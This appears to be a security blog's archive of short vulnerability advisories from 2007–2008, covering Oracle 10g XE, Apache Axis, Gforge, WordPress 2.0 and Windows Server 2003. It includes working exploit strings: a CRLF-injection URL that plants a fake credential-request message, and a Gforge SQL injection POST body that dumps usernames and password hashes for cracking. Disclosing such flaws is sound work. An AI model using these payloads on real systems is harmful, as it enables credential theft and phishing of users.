Oracle 10g Express Edition Cookie’s issue

April 20, 2008 Advisories, Research | Comments (0) sid @ 10:08 am

Oracle 10g Express Edition does not invalidate the cookie www_flow_user2 on server when the user logs off.

Tested in version:- Oracle 10g Express edition 10.2.0.1.0, other versions may also be vulnerable.

Patch:- Oracle CPU April 2008

Apache Axis CRLF And Content Injection

November 1, 2007 Advisories, Research | Comments (0) sid @ 7:53 pm

Version tested:- 1.4

vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4  do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF injection and although, it html encodes all the user's input, thereby denying any XSS or html injection, content injection is still be possible(a minor issue).

Exploit:-http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d

%0a———————%0d%0aAn%20Error%20has%20Occured

%0d%0a%0d%0aplease%20send%20your%20

credentials%20and%20problem%20encountered%20to%20%0d

%0ablah@blah.com%0d%0a————–%0d%0a%0d%0a%0d

%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault - ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

———————

 An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

————–

.jws

 AxisFault

..
 

Gforge SQL Injection

September 13, 2007 Advisories, Research | Comments (0) admin @ 3:03 pm

Original Advisory: http://www.portcullis-security.com/179.php 

The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.

The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using john-the-ripper.

Exploit:-

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

works against postgres database :).

Refer to the paper for exploiting sql injections against postgres database. 

Undisclosed Wordpress 2.0 Security Issues

June 5, 2007 Advisories, Research | Comments (0) admin @ 2:21 pm

I recently came across this security advisory and decided to find out what the undisclosed issues could be. I downloaded wordpress 2.0 to find these undisclosed issues. Why i am interested in wordpress 2.0 is a different story though. :)
It was trivial to figure out that this version has no protection against CSRF attacks. the file wp-admin/options-reading.php has a parameter posts_per_rss that seems to have been left unsanitized. It is possible to make an admin submit (via csrf) a malicious value of this paramter which will eventually result in a database error. However, the injections seems really difficult to exploit.

example:-http://192.168.1.183:80/apache2-default/wordpress/?feed=rss2

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2007-01-08 04:12:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT 0, 10'

As the injection point is after Limit and because of the Order By clause, i think it is not exploitable.
If you think it is indeed exploitable drop me an email now…

Logon Time Restrictions in a Domain in Windows Server 2003 allows Username Enumeration.

May 27, 2007 Advisories, Research | Comments (0) sid @ 9:29 am

Windows Server 2003 can be configured to restrict the hours and days that a user may log on to a Windows Server 2003 domain. This could lead to username enumeration.

Issue:- Microsoft Windows Active Directory Username Enumeration

Criticality:- Less Critical

Impact:- Exposure of system information

Description:- It has been identified that the Microsoft windows Active
Directory contains a flaw that may lead to an unauthorized information
disclosure. The issue is triggered when the Windows Domain Controller
returns different error messages depending on if a valid username was
supplied via windows terminal services. This only happens for the
user accounts that have time restrictions set and when these accounts
are accessed during restricted time. This can be exploited to help
enumerate valid usernames resulting in a loss of confidentiality.

Vendors response:-
“We will NOT be issuing a security update for this issue.
It is likely that in a next version or service pack of the product we may consider making changes, but not before then”.

Screenshots:
1. Error returned When Account is Accessed at Restricted time
2. Error returned When Account is Accessed at Permitted time